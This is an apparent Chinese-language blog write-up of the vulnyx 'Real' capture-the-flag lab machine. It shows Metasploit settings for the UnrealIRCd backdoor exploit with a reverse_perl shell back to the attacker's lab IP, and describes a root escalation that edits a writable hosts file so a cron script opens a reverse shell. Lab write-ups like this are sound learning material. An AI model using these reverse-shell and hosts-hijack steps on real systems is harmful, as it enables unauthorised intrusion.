vulnyx Real writeup

信息收集

nmap

获取userFlag

这三个口上运行的都是UnrealIRCd服务,这是一个服务器软件,用于提供IRC聊天服务,IRC协议是一个基于文本的即时通信协议。使用searchsploit搜一下有无相关漏洞

发现msf里有一个后门的RCE,去看一下

然后进行如下设置:

set rhosts 192.168.43.111
set payload cmd/unix/reverse_perl
set lhost 192.168.43.180
run

这里我payload尝试了reverse、reverse_perl、reverse_ruby,但只有 reverse_perl 成功了,然后反弹一个本地shell回来

userflag就在加目录下

userflag:3b7fb7c1c8737a5c67dc513657e3efb3

获取rootFlag

sudo -l看了后发现需要密码,那么这条路暂时就走不通了,然后suid也没发现什么有用的东西,接下来就去翻翻目录,然后在/opt下看到了有用的信息

通过分析这个shell脚本,可以知道当 ping 目标域名成功时,命令的退出状态码为0,此时就可以触发if分支中的反弹shell的语句了。先去看一下hosts文件是否可写

发现是可写的,那么后面的思路就是把我们kali的ip和这个脚本中的指定域名对应起来写入目标hosts文件,然后在下一次ping时就可以进入if分支,触发反弹shell的语句。然后这里的话是可以通过pspy64监听到是有定时任务在执行task脚本的

root shell 也反弹回来了

rootflag:593ba7e2d1e66b12e1488d6ea30c8787

 

posted @ 2025-07-22 00:03  sky2dawn  阅读(9)  评论(0)    收藏  举报